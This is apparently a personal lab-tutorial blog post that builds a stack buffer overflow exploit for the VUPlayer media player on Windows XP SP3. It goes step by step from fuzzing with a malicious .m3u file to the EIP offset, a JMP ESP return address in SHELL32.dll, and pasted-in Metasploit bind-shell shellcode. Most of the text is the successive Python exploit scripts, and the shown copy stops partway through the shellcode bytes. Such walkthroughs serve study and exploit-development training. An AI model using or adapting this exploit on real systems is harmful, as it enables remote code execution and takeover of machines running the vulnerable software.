This time, i try to exploit with buffer overflow direct ret technique again. I will try to Exploit from the VUPlayer application in WIndows XP SP3 that i've installed on my Virtual Box in my Backtrack OS.
Lets start it. First step, i try to analyze all the type that can be support with VUPlayer. And i got the result like this.
From the information above, i know if the VUPlayer only support the vpl,m3u,cue,pls,asx, and wax extension. Now i try to open this application with ollydbg and i see an information like this
I think i can entry from that modules to exploit this application. There are BASS module, BASSWMA module, and BASSMIDI module. Next, i search the location of that modules and i found it in the list of Executable Mode from ollydbg.
Well then, i try to make a file with that extension. I try to make a fuzzer script by using a python language. My script was like this.
#!usr/bin/python
file="yuza.m3u"
junk="\x41" * 10000
file=open(file,'w')
file.write(junk)
print ("berhasil membuat file")
file.close()
Ok, next i try to run that script. After i run it. It will appear a file that named yuza.m3u.
Well then that file i copy to my Windows in VBox and open it with VUPlayer. And booom. The application was crash. Ok, now i try to open the VUPlayer with Ollydbg application and then i open that m3u file again with VUPlayer. The result inn Ollydbg was like this
From the picture above, i can see if the ECX, ESP, EBP, EDI, and EIP have been overwrited by the m3u file that i've made by the fuzzer script. Well next, i try to use the pattern create. Pattern create was located in directory /pentest/exploit/framework/tools
I typed the command ./pattern_create.rb 10000 > string_pattern.txt and then after that i typed a command kwrite string_pattern.txt to see that file.
Next, i copy that string above to my fuzzer script. I modification my script to be like this.
#!usr/bin/python
file="yuza.m3u"
junk="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk6Gk7Gk8Gk9Gl0Gl1Gl2Gl3Gl4Gl5Gl6Gl7Gl8Gl9Gm0Gm1Gm2Gm3Gm4Gm5Gm6Gm7Gm8Gm9Gn0Gn1Gn2Gn3Gn4Gn5Gn6Gn7Gn8Gn9Go0Go1Go2Go3Go4Go5Go6Go7Go8Go9Gp0Gp1Gp2Gp3Gp4Gp5Gp6Gp7Gp8Gp9Gq0Gq1Gq2Gq3Gq4Gq5Gq6Gq7Gq8Gq9Gr0Gr1Gr2Gr3Gr4Gr5Gr6Gr7Gr8Gr9Gs0Gs1Gs2Gs3Gs4Gs5Gs6Gs7Gs8Gs9Gt0Gt1Gt2Gt3Gt4Gt5Gt6Gt7Gt8Gt9Gu0Gu1Gu2Gu3Gu4Gu5Gu6Gu7Gu8Gu9Gv0Gv1Gv2Gv3Gv4Gv5Gv6Gv7Gv8Gv9Gw0Gw1Gw2Gw3Gw4Gw5Gw6Gw7Gw8Gw9Gx0Gx1Gx2Gx3Gx4Gx5Gx6Gx7Gx8Gx9Gy0Gy1Gy2Gy3Gy4Gy5Gy6Gy7Gy8Gy9Gz0Gz1Gz2Gz3Gz4Gz5Gz6Gz7Gz8Gz9Ha0Ha1Ha2Ha3Ha4Ha5Ha6Ha7Ha8Ha9Hb0Hb1Hb2Hb3Hb4Hb5Hb6Hb7Hb8Hb9Hc0Hc1Hc2Hc3Hc4Hc5Hc6Hc7Hc8Hc9Hd0Hd1Hd2Hd3Hd4Hd5Hd6Hd7Hd8Hd9He0He1He2He3He4He5He6He7He8He9Hf0Hf1Hf2Hf3Hf4Hf5Hf6Hf7Hf8Hf9Hg0Hg1Hg2Hg3Hg4Hg5Hg6Hg7Hg8Hg9Hh0Hh1Hh2Hh3Hh4Hh5Hh6Hh7Hh8Hh9Hi0Hi1Hi2Hi3Hi4Hi5Hi6Hi7Hi8Hi9Hj0Hj1Hj2Hj3Hj4Hj5Hj6Hj7Hj8Hj9Hk0Hk1Hk2Hk3Hk4Hk5Hk6Hk7Hk8Hk9Hl0Hl1Hl2Hl3Hl4Hl5Hl6Hl7Hl8Hl9Hm0Hm1Hm2Hm3Hm4Hm5Hm6Hm7Hm8Hm9Hn0Hn1Hn2Hn3Hn4Hn5Hn6Hn7Hn8Hn9Ho0Ho1Ho2Ho3Ho4Ho5Ho6Ho7Ho8Ho9Hp0Hp1Hp2Hp3Hp4Hp5Hp6Hp7Hp8Hp9Hq0Hq1Hq2Hq3Hq4Hq5Hq6Hq7Hq8Hq9Hr0Hr1Hr2Hr3Hr4Hr5Hr6Hr7Hr8Hr9Hs0Hs1Hs2Hs3Hs4Hs5Hs6Hs7Hs8Hs9Ht0Ht1Ht2Ht3Ht4Ht5Ht6Ht7Ht8Ht9Hu0Hu1Hu2Hu3Hu4Hu5Hu6Hu7Hu8Hu9Hv0Hv1Hv2Hv3Hv4Hv5Hv6Hv7Hv8Hv9Hw0Hw1Hw2Hw3Hw4Hw5Hw6Hw7Hw8Hw9Hx0Hx1Hx2Hx3Hx4Hx5Hx6Hx7Hx8Hx9Hy0Hy1Hy2Hy3Hy4Hy5Hy6Hy7Hy8Hy9Hz0Hz1Hz2Hz3Hz4Hz5Hz6Hz7Hz8Hz9Ia0Ia1Ia2Ia3Ia4Ia5Ia6Ia7Ia8Ia9Ib0Ib1Ib2Ib3Ib4Ib5Ib6Ib7Ib8Ib9Ic0Ic1Ic2Ic3Ic4Ic5Ic6Ic7Ic8Ic9Id0Id1Id2Id3Id4Id5Id6Id7Id8Id9Ie0Ie1Ie2Ie3Ie4Ie5Ie6Ie7Ie8Ie9If0If1If2If3If4If5If6If7If8If9Ig0Ig1Ig2Ig3Ig4Ig5Ig6Ig7Ig8Ig9Ih0Ih1Ih2Ih3Ih4Ih5Ih6Ih7Ih8Ih9Ii0Ii1Ii2Ii3Ii4Ii5Ii6Ii7Ii8Ii9Ij0Ij1Ij2Ij3Ij4Ij5Ij6Ij7Ij8Ij9Ik0Ik1Ik2Ik3Ik4Ik5Ik6Ik7Ik8Ik9Il0Il1Il2Il3Il4Il5Il6Il7Il8Il9Im0Im1Im2Im3Im4Im5Im6Im7Im8Im9In0In1In2In3In4In5In6In7In8In9Io0Io1Io2Io3Io4Io5Io6Io7Io8Io9Ip0Ip1Ip2Ip3Ip4Ip5Ip6Ip7Ip8Ip9Iq0Iq1Iq2Iq3Iq4Iq5Iq6Iq7Iq8Iq9Ir0Ir1Ir2Ir3Ir4Ir5Ir6Ir7Ir8Ir9Is0Is1Is2Is3Is4Is5Is6Is7Is8Is9It0It1It2It3It4It5It6It7It8It9Iu0Iu1Iu2Iu3Iu4Iu5Iu6Iu7Iu8Iu9Iv0Iv1Iv2Iv3Iv4Iv5Iv6Iv7Iv8Iv9Iw0Iw1Iw2Iw3Iw4Iw5Iw6Iw7Iw8Iw9Ix0Ix1Ix2Ix3Ix4Ix5Ix6Ix7Ix8Ix9Iy0Iy1Iy2Iy3Iy4Iy5Iy6Iy7Iy8Iy9Iz0Iz1Iz2Iz3Iz4Iz5Iz6Iz7Iz8Iz9Ja0Ja1Ja2Ja3Ja4Ja5Ja6Ja7Ja8Ja9Jb0Jb1Jb2Jb3Jb4Jb5Jb6Jb7Jb8Jb9Jc0Jc1Jc2Jc3Jc4Jc5Jc6Jc7Jc8Jc9Jd0Jd1Jd2Jd3Jd4Jd5Jd6Jd7Jd8Jd9Je0Je1Je2Je3Je4Je5Je6Je7Je8Je9Jf0Jf1Jf2Jf3Jf4Jf5Jf6Jf7Jf8Jf9Jg0Jg1Jg2Jg3Jg4Jg5Jg6Jg7Jg8Jg9Jh0Jh1Jh2Jh3Jh4Jh5Jh6Jh7Jh8Jh9Ji0Ji1Ji2Ji3Ji4Ji5Ji6Ji7Ji8Ji9Jj0Jj1Jj2Jj3Jj4Jj5Jj6Jj7Jj8Jj9Jk0Jk1Jk2Jk3Jk4Jk5Jk6Jk7Jk8Jk9Jl0Jl1Jl2Jl3Jl4Jl5Jl6Jl7Jl8Jl9Jm0Jm1Jm2Jm3Jm4Jm5Jm6Jm7Jm8Jm9Jn0Jn1Jn2Jn3Jn4Jn5Jn6Jn7Jn8Jn9Jo0Jo1Jo2Jo3Jo4Jo5Jo6Jo7Jo8Jo9Jp0Jp1Jp2Jp3Jp4Jp5Jp6Jp7Jp8Jp9Jq0Jq1Jq2Jq3Jq4Jq5Jq6Jq7Jq8Jq9Jr0Jr1Jr2Jr3Jr4Jr5Jr6Jr7Jr8Jr9Js0Js1Js2Js3Js4Js5Js6Js7Js8Js9Jt0Jt1Jt2Jt3Jt4Jt5Jt6Jt7Jt8Jt9Ju0Ju1Ju2Ju3Ju4Ju5Ju6Ju7Ju8Ju9Jv0Jv1Jv2Jv3Jv4Jv5Jv6Jv7Jv8Jv9Jw0Jw1Jw2Jw3Jw4Jw5Jw6Jw7Jw8Jw9Jx0Jx1Jx2Jx3Jx4Jx5Jx6Jx7Jx8Jx9Jy0Jy1Jy2Jy3Jy4Jy5Jy6Jy7Jy8Jy9Jz0Jz1Jz2Jz3Jz4Jz5Jz6Jz7Jz8Jz9Ka0Ka1Ka2Ka3Ka4Ka5Ka6Ka7Ka8Ka9Kb0Kb1Kb2Kb3Kb4Kb5Kb6Kb7Kb8Kb9Kc0Kc1Kc2Kc3Kc4Kc5Kc6Kc7Kc8Kc9Kd0Kd1Kd2Kd3Kd4Kd5Kd6Kd7Kd8Kd9Ke0Ke1Ke2Ke3Ke4Ke5Ke6Ke7Ke8Ke9Kf0Kf1Kf2Kf3Kf4Kf5Kf6Kf7Kf8Kf9Kg0Kg1Kg2Kg3Kg4Kg5Kg6Kg7Kg8Kg9Kh0Kh1Kh2Kh3Kh4Kh5Kh6Kh7Kh8Kh9Ki0Ki1Ki2Ki3Ki4Ki5Ki6Ki7Ki8Ki9Kj0Kj1Kj2Kj3Kj4Kj5Kj6Kj7Kj8Kj9Kk0Kk1Kk2Kk3Kk4Kk5Kk6Kk7Kk8Kk9Kl0Kl1Kl2Kl3Kl4Kl5Kl6Kl7Kl8Kl9Km0Km1Km2Km3Km4Km5Km6Km7Km8Km9Kn0Kn1Kn2Kn3Kn4Kn5Kn6Kn7Kn8Kn9Ko0Ko1Ko2Ko3Ko4Ko5Ko6Ko7Ko8Ko9Kp0Kp1Kp2Kp3Kp4Kp5Kp6Kp7Kp8Kp9Kq0Kq1Kq2Kq3Kq4Kq5Kq6Kq7Kq8Kq9Kr0Kr1Kr2Kr3Kr4Kr5Kr6Kr7Kr8Kr9Ks0Ks1Ks2Ks3Ks4Ks5Ks6Ks7Ks8Ks9Kt0Kt1Kt2Kt3Kt4Kt5Kt6Kt7Kt8Kt9Ku0Ku1Ku2Ku3Ku4Ku5Ku6Ku7Ku8Ku9Kv0Kv1Kv2Kv3Kv4Kv5Kv6Kv7Kv8Kv9Kw0Kw1Kw2Kw3Kw4Kw5Kw6Kw7Kw8Kw9Kx0Kx1Kx2Kx3Kx4Kx5Kx6Kx7Kx8Kx9Ky0Ky1Ky2Ky3Ky4Ky5Ky6Ky7Ky8Ky9Kz0Kz1Kz2Kz3Kz4Kz5Kz6Kz7Kz8Kz9La0La1La2La3La4La5La6La7La8La9Lb0Lb1Lb2Lb3Lb4Lb5Lb6Lb7Lb8Lb9Lc0Lc1Lc2Lc3Lc4Lc5Lc6Lc7Lc8Lc9Ld0Ld1Ld2Ld3Ld4Ld5Ld6Ld7Ld8Ld9Le0Le1Le2Le3Le4Le5Le6Le7Le8Le9Lf0Lf1Lf2Lf3Lf4Lf5Lf6Lf7Lf8Lf9Lg0Lg1Lg2Lg3Lg4Lg5Lg6Lg7Lg8Lg9Lh0Lh1Lh2Lh3Lh4Lh5Lh6Lh7Lh8Lh9Li0Li1Li2Li3Li4Li5Li6Li7Li8Li9Lj0Lj1Lj2Lj3Lj4Lj5Lj6Lj7Lj8Lj9Lk0Lk1Lk2Lk3Lk4Lk5Lk6Lk7Lk8Lk9Ll0Ll1Ll2Ll3Ll4Ll5Ll6Ll7Ll8Ll9Lm0Lm1Lm2Lm3Lm4Lm5Lm6Lm7Lm8Lm9Ln0Ln1Ln2Ln3Ln4Ln5Ln6Ln7Ln8Ln9Lo0Lo1Lo2Lo3Lo4Lo5Lo6Lo7Lo8Lo9Lp0Lp1Lp2Lp3Lp4Lp5Lp6Lp7Lp8Lp9Lq0Lq1Lq2Lq3Lq4Lq5Lq6Lq7Lq8Lq9Lr0Lr1Lr2Lr3Lr4Lr5Lr6Lr7Lr8Lr9Ls0Ls1Ls2Ls3Ls4Ls5Ls6Ls7Ls8Ls9Lt0Lt1Lt2Lt3Lt4Lt5Lt6Lt7Lt8Lt9Lu0Lu1Lu2Lu3Lu4Lu5Lu6Lu7Lu8Lu9Lv0Lv1Lv2Lv3Lv4Lv5Lv6Lv7Lv8Lv9Lw0Lw1Lw2Lw3Lw4Lw5Lw6Lw7Lw8Lw9Lx0Lx1Lx2Lx3Lx4Lx5Lx6Lx7Lx8Lx9Ly0Ly1Ly2Ly3Ly4Ly5Ly6Ly7Ly8Ly9Lz0Lz1Lz2Lz3Lz4Lz5Lz6Lz7Lz8Lz9Ma0Ma1Ma2Ma3Ma4Ma5Ma6Ma7Ma8Ma9Mb0Mb1Mb2Mb3Mb4Mb5Mb6Mb7Mb8Mb9Mc0Mc1Mc2Mc3Mc4Mc5Mc6Mc7Mc8Mc9Md0Md1Md2Md3Md4Md5Md6Md7Md8Md9Me0Me1Me2Me3Me4Me5Me6Me7Me8Me9Mf0Mf1Mf2Mf3Mf4Mf5Mf6Mf7Mf8Mf9Mg0Mg1Mg2Mg3Mg4Mg5Mg6Mg7Mg8Mg9Mh0Mh1Mh2Mh3Mh4Mh5Mh6Mh7Mh8Mh9Mi0Mi1Mi2Mi3Mi4Mi5Mi6Mi7Mi8Mi9Mj0Mj1Mj2Mj3Mj4Mj5Mj6Mj7Mj8Mj9Mk0Mk1Mk2Mk3Mk4Mk5Mk6Mk7Mk8Mk9Ml0Ml1Ml2Ml3Ml4Ml5Ml6Ml7Ml8Ml9Mm0Mm1Mm2Mm3Mm4Mm5Mm6Mm7Mm8Mm9Mn0Mn1Mn2Mn3Mn4Mn5Mn6Mn7Mn8Mn9Mo0Mo1Mo2Mo3Mo4Mo5Mo6Mo7Mo8Mo9Mp0Mp1Mp2Mp3Mp4Mp5Mp6Mp7Mp8Mp9Mq0Mq1Mq2Mq3Mq4Mq5Mq6Mq7Mq8Mq9Mr0Mr1Mr2Mr3Mr4Mr5Mr6Mr7Mr8Mr9Ms0Ms1Ms2Ms3Ms4Ms5Ms6Ms7Ms8Ms9Mt0Mt1Mt2Mt3Mt4Mt5Mt6Mt7Mt8Mt9Mu0Mu1Mu2Mu3Mu4Mu5Mu6Mu7Mu8Mu9Mv0Mv1Mv2M"
file=open(file,'w')
file.write(junk)
print ("berhasil membuat file")
file.close()
Then i try to run that script again and i open the m3u file that have been created by that script with VUPlayer and Ollydbg.
Oke, the string from the string pattern have been overwritten to the register memory. Next step i try to count the size of data to overwrite the EIP and stack. I use the string offset to do this. pattern offset tools located in the same directory with pattern create. Ok, to count the EIP i use the command ./pattern offset 68423768 and to count the stack i use the command ./pattern_offset 8Bh9Bi
From the picture above, i got the information if to achieved the EIP register, i need 1012 byte data and to achieved the stack, i need 1016 byte data. Next, i change my fuzzer script again and try to change the value of EIP to be DEADBEEF. The script that i have change was like this:
#!usr/bin/python
file="yuza.m3u"
junk="\x90" * 1012
junk+="\xEF\xBE\xAD\xDE"
file=open(file,'w')
file.write(junk)
print ("berhasil membuat file")
file.close()
Next, i run that script again and then execute the m3u file that have been created by that script with VUPlayer and ollydbg. Well, i got a result like this
well it's succes. Next i modification again the fuzzer script:
#!usr/bin/python
file="yuza.m3u"
junk="\x90" * 1012
junk+="\xEF\xBE\xAD\xDE"
junk+="\x90" * (1016-len(junk))
junk+="\xCC" * (10000-len(junk))
file=open(file,'w')
file.write(junk)
print ("berhasil membuat file")
file.close()
i run that script again and then execute the m3u file that have been created by that script with VUPlayer and ollydbg. Well, i got a result like this
Well, look at that picture above. I can see if the stack was overwrite by the ASCI CCCC character. Next, i try to look the list of Library that used by an application VUPlayer. I clicked the View Menu in Ollydbg and i click again the menu Executable Modules.
From the list of library above, i choose SHELL32.dll to use it to entry inside the stack. Then i click on shell32.dll and then appear a window like this
After that i search a command JMP ESP inside that file. Command JSP EMP is a command that used to application to read the data which located inside the buffer, so that the value from register EIP will move to the inside an address memory where inside it has been saved command JSP EMP. A simple procces is like this Register EIP -> an address memory that located the JMP ESP command -> Register ESP -> Buffer (Stack) -> payload execution. In the main window i click Right button on Mouse -> Search For -> Command and then i typed JMP ESP on it and i found like this
To choosing an address memory which will be use to exploit, that address should not contain the value \x00, \x0a and \x0d. The third address can broken the payload code that will sended to the buffer(stack) memory. In my case, an address that appear is 7C9D30D7 FFE4 JMP ESP.
Next, i change my fuzzer script again to change the value of EIP to be an address of JMP ESP. My script is like this:
file="yuza.m3u"
junk="\x90" * 1012
junk+="\xD7\x30\x9D\x7C"
junk+="\x90" * (1016-len(junk))
junk+="\xCC" * (10000-len(junk))
file=open(file,'w')
file.write(junk)
print ("berhasil membuat file")
file.close()
Then i run that script again and then
execute the m3u file that have been created by that script with VUPlayer and ollydbg.
Ok,
the last step is generate the payload. To generate the payload, i use
the Metasploit Framework web based. In this case, i use the Windows Bind Shell payload.
From the result of the generate payload above. I copy it to the script fuzzer.
#!usr/bin/python
file="yuza.m3u"
junk="\x90" * 1012
junk+="\xD7\x30\x9D\x7C"
junk+="\x90" * 32
junk+=("\xbf\x67\x14\xbd\x7d\x2b\xc9\xda\xc5\xb1\x51\xd9\x74\x24\xf4\x5e"
"\x31\x7e\x10\x03\x7e\x10\x83\xa1\x10\x5f\x88\xd1\x73\x74\x3e\xc1"
